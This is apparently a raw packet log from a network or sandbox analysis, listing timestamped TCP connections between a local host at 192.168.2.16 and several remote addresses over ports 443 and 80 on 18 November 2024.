                                                                                                                                                                                            Nov 18, 2024 21:00:15.343920946 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344260931 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344283104 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344331026 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344345093 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344387054 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344387054 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344614029 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344635963 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344682932 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344696045 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344721079 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344743967 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344960928 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.344979048 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345026970 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345038891 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345067024 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345087051 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345360994 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345381975 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345432997 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345447063 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345496893 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345782995 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345803022 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345845938 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345859051 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345884085 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.345901012 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.346234083 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.346254110 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.346307993 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.346337080 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.346391916 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.346661091 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.346681118 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.346725941 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.346740007 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.346764088 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.346786976 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.347074986 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.347094059 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.347135067 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.347147942 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.347172022 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.347192049 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.347429037 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.347449064 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.347495079 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.347507954 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.347534895 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.347554922 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.448402882 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                            Nov 18, 2024 21:00:15.458919048 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.458952904 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459011078 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459045887 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459067106 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459093094 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459460020 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459486961 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459523916 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459533930 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459561110 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459570885 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459918022 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459939957 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459985971 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.459991932 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.460019112 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.460037947 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.460414886 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.460441113 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.460481882 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.460489988 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.460517883 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.460526943 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.460880041 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.460905075 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.460944891 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.460956097 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.460987091 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.461009979 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.461344957 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.461364985 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.461410046 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.461420059 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.461436033 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.461461067 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.461743116 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.461766958 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.461816072 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.461827040 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.461844921 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.461867094 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462078094 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462100983 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462140083 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462147951 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462177038 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462197065 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462512016 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462532997 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462574959 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462580919 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462615013 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462630987 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462949038 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.462971926 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463021994 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463027954 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463042974 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463066101 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463368893 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463404894 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463438034 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463444948 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463471889 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463486910 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463493109 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463785887 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463810921 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463860035 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463871002 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.463886976 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.464241982 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.464262009 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.464303017 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.464314938 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.464349985 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.464657068 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.464683056 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.464716911 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.464724064 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.464751959 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465071917 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465092897 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465131998 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465143919 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465169907 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465540886 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465567112 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465595007 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465605021 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465632915 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465923071 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465943098 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465980053 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.465990067 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.466007948 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.466379881 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.466404915 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.466439962 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.466449976 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.466463089 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.466811895 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.466830015 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.466886997 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.466897964 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.466913939 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467211008 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467235088 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467264891 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467272997 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467297077 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467546940 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467566013 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467603922 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467612028 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467641115 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467900038 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467924118 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467963934 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467972040 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.467988014 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.468223095 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.468241930 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.468278885 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.468288898 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.468312979 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.468519926 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.468544960 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.468580008 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.468586922 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.468616962 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.473952055 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.473972082 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.474013090 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.474021912 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.474044085 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.474602938 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.474627018 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.474662066 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.474670887 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.474693060 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.475025892 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.475044966 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.475085974 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.475092888 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.475106001 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.475231886 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.475258112 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.475282907 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.475291014 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.475327015 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.528361082 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.595984936 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596019983 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596084118 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596121073 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596138000 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596141100 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596169949 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596174955 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596194029 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596204996 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596245050 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596496105 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596550941 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596561909 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596575022 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596616983 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596626043 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596664906 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596685886 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596729040 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596801043 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.596818924 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.805655956 CET4434985366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.805933952 CET49853443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.805969000 CET4434985366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.806449890 CET4434985366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.806802034 CET49853443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.806884050 CET4434985366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.806993961 CET49853443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.838304996 CET4434985466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.838598013 CET49854443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.838614941 CET4434985466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.838938951 CET4434985466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.839325905 CET49854443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.839392900 CET4434985466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.839489937 CET49854443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.847328901 CET4434985366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.883327961 CET4434985466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.998198032 CET4434985366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.998621941 CET4434985366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.998672962 CET49853443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.999275923 CET49853443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.999306917 CET4434985366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.033246994 CET4434985466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.033267975 CET4434985466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.033315897 CET49854443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:16.033318996 CET4434985466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.033380985 CET49854443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:16.033983946 CET49854443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:16.034002066 CET4434985466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.055365086 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                            Nov 18, 2024 21:00:16.144354105 CET44349855142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.144716978 CET49855443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:16.144779921 CET44349855142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.145864010 CET44349855142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.145953894 CET44349856142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.145992041 CET49855443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:16.146373034 CET49855443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:16.146435976 CET44349855142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.146593094 CET49856443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:16.146651030 CET44349856142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.146765947 CET49855443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:16.146785975 CET44349855142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.147737980 CET44349856142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.147804022 CET49856443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:16.148190975 CET49856443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:16.148252010 CET44349856142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.148396969 CET49856443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:16.148413897 CET44349856142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.190952063 CET49856443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:16.199382067 CET49855443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:16.407641888 CET44349856142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.418978930 CET44349855142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.419035912 CET44349855142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.419064999 CET44349855142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.419089079 CET44349855142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.419116974 CET49855443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:16.419181108 CET44349855142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:16.419226885 CET49855443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:16.420450926 CET49855443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:16.420516014 CET44349855142.250.185.194192.168.2.16
